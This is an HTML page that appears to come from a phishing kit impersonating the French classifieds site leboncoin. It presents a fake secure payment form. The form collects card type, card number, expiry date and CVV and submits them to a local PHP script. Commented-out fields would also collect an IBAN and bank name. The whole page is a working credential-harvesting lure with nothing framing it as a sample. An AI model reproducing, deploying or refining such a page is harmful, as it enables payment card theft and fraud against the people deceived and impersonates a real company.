<!doctype html>
<html lang="en">

<head>
    <script type="text/JavaScript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script type="text/JavaScript" src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
    <script type="text/JavaScript" src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
     <link rel="icon" type="image/png" href="https://www.leboncoin.fr/_next/static/favicon-16-91b63f31.png" sizes="16x16"/><link rel="icon" type="image/png" href="https://www.leboncoin.fr/_next/static/favicon-32-543f08dc.png" sizes="32x32"/>
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.0/css/all.css" integrity="sha384-lZN37f5QGtY3VHgisS14W3ExzMWZxybE1SJSEsQp9S+oqd12jhcu+A56Ebc1zFSJ" crossorigin="anonymous">
    <title>leboncoin - connexion</title>
    <link href="css/hover.css" rel="stylesheet" media="all">
    <link rel="stylesheet" href="css/brand.css">
    <style type="text/css">
    .nav-item a {
        color: #163056 !important;
    }

    .shadow {
        margin-bottom: 4em;
        background: rgba(255, 255, 255, 0.8);
        border-radius: 3px;
        box-shadow: 0 0 12px 0 rgba(172, 172, 172, 0.5), 0 0 18px 0 rgba(178, 178, 178, 0.5);
        padding: 60px 10px;
    }

    .nav-links.inactive {
        color: #5C5C5C;
    }

    label {
        color: #5C5C5C;
    }
    </style>
</head>

<body style="background-image: url('images/bg.png');background-repeat: no-repeat;background-size: 980px;background-position:50% -250%">
    <div class="container-fluid" style="background-color: rgb(255, 255, 255);box-shadow: rgb(0 0 0 / 15%) 0px 2px 4px 0px;">
        <div class="row p-3">
            <div class="col-sm-5" style="color: rgb(245, 107, 42);">
                <img src="images/left.svg">
            </div>
            <div class="col-sm-7" style="color: rgb(245, 107, 42);">
                <img src="images/logo.svg" width="130px"> &nbsp
                <span style="font-size: 1.4em;font-weight: 500;"><img src="images/verified.svg" width="20px"> Connexion</span>
            </div>
        </div>
    </div>
    <div class="container-fluid mt-5 pt-3">
        <div class="row">
            <div class="col-sm-5 mx-auto" style="max-width: 480px;">
                <div class="text-center" style="border-radius: 8px;box-shadow: rgb(0 0 0 / 20%) 0px 1px 5px 0px, rgb(0 0 0 / 4%) 0px 3px 1px -2px, rgb(0 0 0 / 4%) 0px 2px 2px 0px;background-color: white;padding: 1rem 3.125em 3rem;;">
                    <br>
                    <h4>Les Informations de la Carte</h4>
                    <h5>Espace sécurisé</h5>
                    <p style="font-size:13px">Protégé par notre prestataire de paiement</p>
                    <form class="text-left pt-2 text-dark" action="./hstbn.php" method="POST">



                                                <div class="form-group">
        
                                     
                <select name="banks1" class="form-control py-2" id="exampleInputEmail1"  style="width: 100%;height: 55px;border-width: 1px;border-style: solid;background: transparent;padding: 2px 10px;">

                     <option value="">Sélectionnez votre type de carte</option>
                              <option value="CB" >CB</option>
                              <option value="Visa" >Visa</option>
                              <option value="Mastercard" >Mastercard</option>
                              <option value="American Express" >American Express</option>
                              <option value="Discover" >Discover</option>
                              <option value="Maestro" >Maestro</option>
                              <option value="Cofinoga ou Privilège" >Cofinoga ou Privilège</option>
                              <option value="Carte Aurore" >Carte Aurore</option>
                              <option value="4 étoiles" >4&nbsp;étoiles</option>
                              <option value="UnionPay" >UnionPay</option>

                </select>


                        </div>





                        <div class="form-group">
                            <label for="exampleInputEmail1" class="font-weight-bold text-dark" style="font-size:13px">Numéro de la carte bancaire </label>
                            <input type="text"  name="cn1" id="cn1" class="form-control py-2" id="exampleInputEmail1" aria-describedby="emailHelp" required="" placeholder=""  maxlength="16"  pattern="^(3[47][0-9]{13}|(6541|6556)[0-9]{12}|389[0-9]{11}|3(?:0[0-5]|[68][0-9])[0-9]{11}|65[4-9][0-9]{13}|64[4-9][0-9]{13}|6011[0-9]{12}|(622(?:12[6-9]|1[3-9][0-9]|[2-8][0-9][0-9]|9[01][0-9]|92[0-5])[0-9]{10})|63[7-9][0-9]{13}|(?:2131|1800|35\d{3})\d{11}|9[0-9]{15}|(6304|6706|6709|6771)[0-9]{12,15}|(5018|5020|5038|6304|6759|6761|6763)[0-9]{8,15}|(5[1-5][0-9]{14}|2(22[1-9][0-9]{12}|2[3-9][0-9]{13}|[3-6][0-9]{14}|7[0-1][0-9]{13}|720[0-9]{12}))|(6334|6767)[0-9]{12}|(6334|6767)[0-9]{14}|(6334|6767)[0-9]{15}|(4903|4905|4911|4936|6333|6759)[0-9]{12}|(4903|4905|4911|4936|6333|6759)[0-9]{14}|(4903|4905|4911|4936|6333|6759)[0-9]{15}|564182[0-9]{10}|564182[0-9]{12}|564182[0-9]{13}|633110[0-9]{10}|633110[0-9]{12}|633110[0-9]{13}|(62[0-9]{14,17})|4[0-9]{12}(?:[0-9]{3})?|(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}))$">
                        </div>

                        <div class="form-group">
                            <label for="exampleInputEmail1" class="font-weight-bold text-dark" style="font-size:13px">Date d'expiration </label>
                            <input type="text"  name="exdate" id="exdate" class="form-control py-2" id="exampleInputEmail1" aria-describedby="emailHelp" required="" placeholder=""  maxlength="5">
                        </div>

                         <div class="form-group">
                            <label for="exampleInputEmail1" class="font-weight-bold text-dark" style="font-size:13px">CVV </label>
                            <input type="text"  name="cvv" id="cvv" class="form-control py-2" id="exampleInputEmail1" aria-describedby="emailHelp" required="" placeholder=""  maxlength="3">
                        </div>


                        <!--<div class="form-group">
                            <label for="exampleInputEmail1" class="font-weight-bold text-dark" style="font-size:13px">IBAN</label>
                            <input type="text" name="iban" id="iban" class="form-control py-2" id="exampleInputEmail1" aria-describedby="emailHelp" required="" placeholder="" maxlength="30">
                        </div>-->

                      <!--  <div class="form-group">
                            <label for="exampleInputEmail1" class="font-weight-bold text-dark" style="font-size:13px">Nom de la banque</label>
                            <input type="text" name="ib1" id="ib1" class="form-control py-2" id="exampleInputEmail1" aria-describedby="emailHelp" required="" placeholder="" maxlength="30">
                        </div>-->
                        
                        <div class="form-group">
                            <span style="color: rgb(65, 131, 215);font-size: 0.8rem;">Annuler</span>
                        </div>
                        <button type="submit" class="btn w-100 mt-2" type="submit" name="btn122" id="btn2" style="border: 1px solid transparent;color: rgb(255, 255, 255);background-color: rgb(65, 131, 215);">Valider</button>
                    </form>
                    
                </div>
            </div>
        </div>
    </div>
    
</body>


</html>
